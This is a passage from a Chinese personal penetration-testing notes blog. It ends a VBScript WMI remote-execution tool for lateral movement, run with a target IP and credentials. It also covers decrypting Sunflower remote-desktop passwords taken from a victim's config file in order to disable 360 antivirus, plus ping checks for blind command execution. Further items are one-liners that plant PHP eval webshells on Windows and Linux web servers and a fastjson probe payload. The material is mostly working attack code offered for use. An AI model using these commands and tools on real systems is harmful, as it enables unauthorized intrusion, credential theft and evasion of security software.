    		WScript.Echo &quot;WMIEXEC ERROR: Invalid File Path!&quot;</span><br><span class="line">	    	Case 22</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Share Name Already In Used!&quot;</span><br><span class="line">	    	Case 24</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Directory NOT exists!&quot;</span><br><span class="line">	    End Select</span><br><span class="line">		If intReturn &lt;&gt; 22 Then WScript.Quit</span><br><span class="line">	Else</span><br><span class="line">	    WScript.Echo &quot;WMIEXEC : Share created sucess.&quot;</span><br><span class="line">		WScript.Echo &quot;WMIEXEC : Share Name -&gt; WMI_SHARE&quot;</span><br><span class="line">		WScript.Echo &quot;WMIEXEC : Share Path -&gt; &quot; &amp; FilePath</span><br><span class="line">	End If</span><br><span class="line">End Function</span><br><span class="line"></span><br><span class="line">Function DeleteShare()</span><br><span class="line">	Set colShares &#x3D; objWMIService.ExecQuery _</span><br><span class="line">		(&quot;Select * from Win32_Share Where Name &#x3D; &#39;WMI_SHARE&#39;&quot;)</span><br><span class="line">	For Each objShare In colShares</span><br><span class="line">		intReturn &#x3D; objShare.Delete</span><br><span class="line">	Next</span><br><span class="line">	If intReturn &lt;&gt; 0 Then</span><br><span class="line">		WScript.Echo &quot;WMIEXEC ERROR: Delete Share failed.&quot; &amp; _</span><br><span class="line">	        vbNewLine &amp; &quot;WMIEXEC ERROR: Return value -&gt; &quot; &amp; intReturn</span><br><span class="line">	    Select Case intReturn</span><br><span class="line">	    	Case 2</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Access Denied!&quot;</span><br><span class="line">	    	Case 25</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Share Not Exists!&quot;</span><br><span class="line">	    End Select</span><br><span class="line">	Else</span><br><span class="line">	    WScript.Echo &quot;WMIEXEC : Share deleted sucess.&quot;</span><br><span class="line">	End If</span><br><span class="line">End Function</span><br><span class="line"></span><br><span class="line">Function Exec(cmd， file)</span><br><span class="line">	Set objStartup &#x3D; objWMIService.Get(&quot;Win32_ProcessStartup&quot;)</span><br><span class="line">	Set objConfig &#x3D; objStartup.SpawnInstance_</span><br><span class="line">	objConfig.ShowWindow &#x3D; 12</span><br><span class="line">	</span><br><span class="line">	Set objProcess&#x3D;objWMIService.get(&quot;Win32_Process&quot;)</span><br><span class="line">	strExec &#x3D; &quot;cmd.exe &#x2F;c &quot; &amp; cmd &amp; &quot; &gt; &quot; &amp; file &amp; &quot; 2&gt;&amp;1&quot;  &#39;2&gt;&amp;1 err</span><br><span class="line">	If boolPersist Then</span><br><span class="line">		strExec &#x3D; cmd</span><br><span class="line">		intPath &#x3D; InStr(cmd，&quot;\&quot;)</span><br><span class="line">		If intPath &#x3D; 0 Then strExec &#x3D; CurrentFolder &amp; &quot;\&quot; &amp; strExec</span><br><span class="line">	End If</span><br><span class="line">	&#39;WScript.Echo strExec</span><br><span class="line">	intReturn &#x3D; objProcess.Create _</span><br><span class="line">	    (strExec， CurrentFolder， objConfig， intProcessID)  &#39;Add CurrentFolder (strExec， Null， objConfig， intProcessID)</span><br><span class="line">	If intReturn &lt;&gt; 0 Then</span><br><span class="line">		WScript.Echo &quot;WMIEXEC ERROR: Process could not be created.&quot; &amp; _</span><br><span class="line">	        vbNewLine &amp; &quot;WMIEXEC ERROR: Command -&gt; &quot; &amp; cmd &amp; _</span><br><span class="line">	        vbNewLine &amp; &quot;WMIEXEC ERROR: Return value -&gt; &quot; &amp; intReturn</span><br><span class="line">	    Select Case intReturn</span><br><span class="line">	    	Case 2</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Access Denied!&quot;</span><br><span class="line">			Case 3</span><br><span class="line">				WScript.Echo &quot;WMIEXEC ERROR: Insufficient Privilege!&quot;</span><br><span class="line">	    	Case 9</span><br><span class="line">	    		WScript.Echo &quot;WMIEXEC ERROR: Path Not Found!&quot;</span><br><span class="line">	    End Select</span><br><span class="line">	Else</span><br><span class="line">&#39;	    WScript.Echo &quot;Process created.&quot; &amp; _</span><br><span class="line">&#39;	        vbNewLine &amp; &quot;Command: &quot; &amp; cmd &amp; _</span><br><span class="line">&#39;	        vbNewLine &amp; &quot;Process ID: &quot; &amp; intProcessID</span><br><span class="line">		If boolPersist Then WScript.Echo &quot;WMIEXEC : Process created. PID: &quot;&amp; intProcessID</span><br><span class="line">	    If boolGetFolder &#x3D; True Then </span><br><span class="line">	    	boolGetFolder &#x3D; False</span><br><span class="line">	    	Exec &#x3D; GetCurrentFolder()</span><br><span class="line">	    	Exit Function</span><br><span class="line">	    End If</span><br><span class="line">	    &#39;ReadResult()</span><br><span class="line">	End If</span><br><span class="line">End Function</span><br><span class="line"></span><br><span class="line">Function ReadResult()</span><br><span class="line">	WScript.Sleep(WAITTIME)</span><br><span class="line">	UNCFilePath &#x3D; &quot;\\&quot; &amp; host &amp; &quot;\&quot; &amp; &quot;WMI_SHARE&quot; &amp; &quot;\&quot; &amp; FileName</span><br><span class="line">	Set fso &#x3D; CreateObject(&quot;Scripting.FileSystemObject&quot;)</span><br><span class="line">	Set objFile &#x3D; fso.OpenTextFile(UNCFilePath， 1)</span><br><span class="line">	If Not objFile.AtEndOfStream Then strContents &#x3D; objFile.ReadAll</span><br><span class="line">	objFile.Close</span><br><span class="line">	WScript.Echo strContents</span><br><span class="line">	&#39;fso.DeleteFile(UNCFilePath)   win2008 fso has no privilege to delete file on share folder</span><br><span class="line">	strDelFile &#x3D; &quot;del &quot; &amp; file &amp; &quot; &#x2F;F&quot;</span><br><span class="line">	Exec strDelFile，&quot;nul&quot;</span><br><span class="line">End Function</span><br><span class="line"></span><br><span class="line">Function GetCurrentFolder()</span><br><span class="line">	WScript.Sleep(WAITTIME)</span><br><span class="line">	UNCFilePath &#x3D; &quot;\\&quot; &amp; host &amp; &quot;\&quot; &amp; &quot;WMI_SHARE&quot; &amp; &quot;\&quot; &amp; FileName</span><br><span class="line">	Set fso &#x3D; CreateObject(&quot;Scripting.FileSystemObject&quot;)</span><br><span class="line">	Set objFile &#x3D; fso.OpenTextFile(UNCFilePath， 1)</span><br><span class="line">	GetCurrentFolder &#x3D; objFile.ReadLine</span><br><span class="line">	objFile.Close</span><br><span class="line">	strDelFile &#x3D; &quot;del &quot; &amp; file &amp; &quot; &#x2F;F&quot;</span><br><span class="line">	Exec strDelFile，&quot;nul&quot;</span><br><span class="line">End Function</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">保存上面内容为vv.vbs，命令行如下</span><br><span class="line">cscript.exe &#x2F;&#x2F;nologo vv.vbs &#x2F;shell 1.1.1.1 用户名 密码</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220117162706080.png" alt="image-20220117162706080"></p>
<h2 id="向日葵口令解密"><a href="#向日葵口令解密" class="headerlink" title="向日葵口令解密"></a>向日葵口令解密</h2><p>使用<a target="_blank" rel="noopener" href="https://github.com/wafinfo/Sunflower_get_Password">https://github.com/wafinfo/Sunflower_get_Password</a></p>
<p>找到向日葵配置文件config.ini</p>
<p>向日葵默认配置文件路径:</p>
<p>安装版：C:\Program Files\Oray\SunLogin\SunloginClient\config.ini</p>
<p>便携版(绿色版)：C:\ProgramData\Oray\SunloginClient\config.ini</p>
<p>把目标机器上的config.ini替换自己机器上对应的向日葵目录下config.ini，然后用sundecrypt.py跑encry_pwd出来的值就是验证码，fastcode就是识别码，注意跑完之后把自己原本的config.ini替换回来，不然自己的向日葵码就和目标机一样了，另外有时候向日葵验证码在连接退出之后会变化。</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220118140702198.png" alt="image-20220118140702198"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">一个问题，曾经想过在目标机器上开启向日葵，然后通过向日葵远程到目标机器上退出360.</span><br><span class="line">向日葵挺大，同一个向日葵，通过冰蝎上传的向日葵无法运行，通过哥斯拉的大文件上传功能上去才可以运行。</span><br><span class="line">上传的向日葵简约版，双击运行后出现uac界面，但测试发现无论但是、否、右上叉都还是能运行向日葵</span><br><span class="line">但问题是无论是冰蝎还是哥斯拉，cmd启动向日葵都会被360告警，cs上启动不会告警，但是上cs的免杀马通过webshell启动也会被360告警</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220118141934237.png" alt="image-20220118141934237"></p>
<h3 id="向日葵更新一"><a href="#向日葵更新一" class="headerlink" title="向日葵更新一"></a>向日葵更新一</h3><p>2022.2.19，之前傻逼了，不用替换本地的配置文件，直接用sundecrypt.py跑encry_pwd就行。</p>
<p>测试用新版的向日葵，发现配置文件路径和名称都变了，其他没变，py还是能跑。但实际内网环境中很少去更新这类软件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Windows\System32\config\systemprofile\AppData\Roaming\Oray\SunloginClient\sys_config.ini</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220219115213855.png" alt="image-20220219115213855"></p>
<h2 id="无回显命令执行判断和写马"><a href="#无回显命令执行判断和写马" class="headerlink" title="无回显命令执行判断和写马"></a>无回显命令执行判断和写马</h2><p>当发现一个疑似命令执行的地方但是没有回显，可以用ping判断，通过设置ping的次数和请求时间判断是否成功执行了命令.而且win和linux的ping次数是不同参数，也可也用这个方法判断机器类型.</p>
<p>windows指定ping次数是-n</p>
<p>linux指定ping次数是-c</p>
<p>像下图-c分别指定2次和6次，时间差别不大，说明要么没命令执行，要么是win命令执行</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211170424359.png" alt="image-20220211170424359"></p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211170500038.png" alt="image-20220211170500038"></p>
<p>用win的-n参数和返回时间可以明显看出存在win命令执行</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211170656817.png" alt="image-20220211170656817"></p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211170742008.png" alt="image-20220211170742008"></p>
<p>盲写马</p>
<p>windows盲写</p>
<p>在网站路径下找到一个静态文件，比如onlyOne.jpg，执行下面的命令就会在相同的目录下新写onlyOne.jpg.php文件。这个命令会遍历盘符，建议从D盘开始，测试时用c盘发现时间比较久</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;r D:\  %i  in  (only*.jpg) do @echo  ^&lt;?php @eval($_POST[1]);?^&gt; &gt; %i.php</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211173312818.png" alt="image-20220211173312818"></p>
<p>url中直接写就可以</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211222704426.png" alt="image-20220211222704426"></p>
<p>linux盲写</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in &#96;find &#x2F; -name &quot;test.jpg&quot;&#96;; do echo &quot;&lt;?php @eval(\$_POST[&#39;cmd&#39;]); ?&gt;&quot; &gt;&#96;basename $i&#96;.php; done</span><br></pre></td></tr></table></figure>

<p>测试时发现在哪个目录执行的命令，文件就写在哪个目录下，而非像win一样写在所查找文件相同的目录</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211221651034.png" alt="image-20220211221651034"></p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211221908920.png" alt="image-20220211221908920"></p>
<p>而且linux要求要有写的权限</p>
<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220211223751182.png" alt="image-20220211223751182"></p>
<h2 id="确定fastjson版本"><a href="#确定fastjson版本" class="headerlink" title="确定fastjson版本"></a>确定fastjson版本</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    </span><br><span class="line">    &quot;@type&quot;: &quot;java.lang.AutoCloseable&quot;</span><br></pre></td></tr></table></figure>

<p><img src="/../../../../images/%E6%9D%82%E8%AE%B0/image-20220309102225352.png" alt="image-20220309102225352"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%9D%82%E8%AE%B0/" rel="tag"># 杂记</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/04/app%E5%AD%A6%E4%B9%A0/" rel="prev" title="app学习">
      <i class="fa fa-chevron-left"></i> app学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/01/18/%E5%85%8D%E6%9D%80%E5%92%8C%E5%8E%BB%E9%BB%91%E7%AA%97/" rel="next" title="免杀和去黑窗">
      免杀和去黑窗 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#searchsploit"><span class="nav-number">1.</span> <span class="nav-text">searchsploit</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#suid%E6%8F%90%E6%9D%83"><span class="nav-number">2.</span> <span class="nav-text">suid提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#nmap%E9%83%A8%E5%88%86%E5%8F%82%E6%95%B0"><span class="nav-number">3.</span> <span class="nav-text">nmap部分参数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#echo%E5%91%BD%E4%BB%A4%E5%86%99%E9%A9%AC"><span class="nav-number">4.</span> <span class="nav-text">echo命令写马</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B6%E4%BB%96"><span class="nav-number">5.</span> <span class="nav-text">其他</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#git%E6%8F%90%E6%9D%83"><span class="nav-number">6.</span> <span class="nav-text">git提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#john"><span class="nav-number">7.</span> <span class="nav-text">john</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E7%AB%99%E5%BA%93%E5%88%86%E7%A6%BB"><span class="nav-number">8.</span> <span class="nav-text">判断站库分离</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#windows%E7%B3%BB%E7%BB%9F%E4%B8%8A%E6%9F%A5%E6%89%BE%E7%BD%91%E7%AB%99%E8%B7%AF%E5%BE%84"><span class="nav-number">9.</span> <span class="nav-text">windows系统上查找网站路径</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#powershell"><span class="nav-number">10.</span> <span class="nav-text">powershell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#cs%E4%B8%8Aargue%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E6%9D%80%E8%BD%AF"><span class="nav-number">11.</span> <span class="nav-text">cs上argue参数绕过杀软</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A1%AE%E5%AE%9A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%98%AF%E7%99%BD%E5%90%8D%E5%8D%95%E8%BF%98%E6%98%AF%E9%BB%91%E5%90%8D%E5%8D%95"><span class="nav-number">12.</span> <span class="nav-text">确定文件上传是白名单还是黑名单</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8B%E6%9C%BA%E5%99%A8%E6%9D%80%E8%BD%AF"><span class="nav-number">13.</span> <span class="nav-text">查看机器杀软</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A1%AE%E8%AE%A4%E6%98%AF%E8%99%9A%E6%8B%9F%E6%9C%BA%E8%BF%98%E6%98%AF%E7%89%A9%E7%90%86%E6%9C%BA"><span class="nav-number">14.</span> <span class="nav-text">确认是虚拟机还是物理机</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%92%8C%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">15.</span> <span class="nav-text">命令执行和反弹shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#vbs%E7%BB%95%E8%BF%87360%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"><span class="nav-number">16.</span> <span class="nav-text">vbs绕过360添加用户</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#win%E8%AE%BE%E7%BD%AE%E5%85%81%E8%AE%B8%E7%A9%BA%E5%8F%A3%E4%BB%A4%E7%99%BB%E5%BD%95"><span class="nav-number">17.</span> <span class="nav-text">win设置允许空口令登录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#java%E5%90%8E%E5%8F%B0%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">18.</span> <span class="nav-text">java后台计划任务反弹shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#base64%E5%86%99%E9%A9%AC"><span class="nav-number">19.</span> <span class="nav-text">base64写马</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#win%E4%B8%8Avbs%E6%A8%AA%E5%90%91"><span class="nav-number">20.</span> <span class="nav-text">win上vbs横向</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%90%91%E6%97%A5%E8%91%B5%E5%8F%A3%E4%BB%A4%E8%A7%A3%E5%AF%86"><span class="nav-number">21.</span> <span class="nav-text">向日葵口令解密</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%90%91%E6%97%A5%E8%91%B5%E6%9B%B4%E6%96%B0%E4%B8%80"><span class="nav-number">21.1.</span> <span class="nav-text">向日葵更新一</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BE%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%A4%E6%96%AD%E5%92%8C%E5%86%99%E9%A9%AC"><span class="nav-number">22.</span> <span class="nav-text">无回显命令执行判断和写马</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A1%AE%E5%AE%9Afastjson%E7%89%88%E6%9C%AC"><span class="nav-number">23.</span> <span class="nav-text">确定fastjson版本</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="thedog"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">thedog</p>
  <div class="site-description" itemprop="description">笑一个</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">17</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://steamcommunity.com/profiles/76561198347024263/" title="steam → https:&#x2F;&#x2F;steamcommunity.com&#x2F;profiles&#x2F;76561198347024263&#x2F;" rel="noopener" target="_blank"><i class="fab fa-steam fa-fw"></i>steam</a>
      </span>
  </div>



      </div>


<script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
<script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
<div class="widget-wrap">
    <div id="myCanvasContainer" class="widget tagcloud">
        <canvas width="250" height="250" id="resCanvas" style="width=100%">
            <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/app/" rel="tag">app</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B8%8A%E7%BA%BF%E6%96%B9%E5%BC%8F/" rel="tag">上线方式</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%8D%E6%9D%80%E6%B5%8B%E8%AF%95/" rel="tag">免杀测试</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" rel="tag">域渗透</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%8F%90%E6%9D%83/" rel="tag">提权</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%91%84%E5%83%8F%E5%A4%B4/" rel="tag">摄像头</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%9D%82%E8%AE%B0/" rel="tag">杂记</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a><span class="tag-list-count">9</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%A1%AC%E4%BB%B6/" rel="tag">硬件</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%80%83%E8%AF%81/" rel="tag">考证</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/" rel="tag">脚本编写</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%92%93%E9%B1%BC/" rel="tag">钓鱼</a><span class="tag-list-count">1</span></li></ul>
        </canvas>
    </div>
</div>


    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">thedog</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Q9yIHCeu9YgeOBK4PDlf45fD-gzGzoHsz',
      appKey     : 'Ny4HdnMmkjlvgFBeGiA6Hgor',
      placeholder: "吱一声",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

    </div>
</body>
</html>
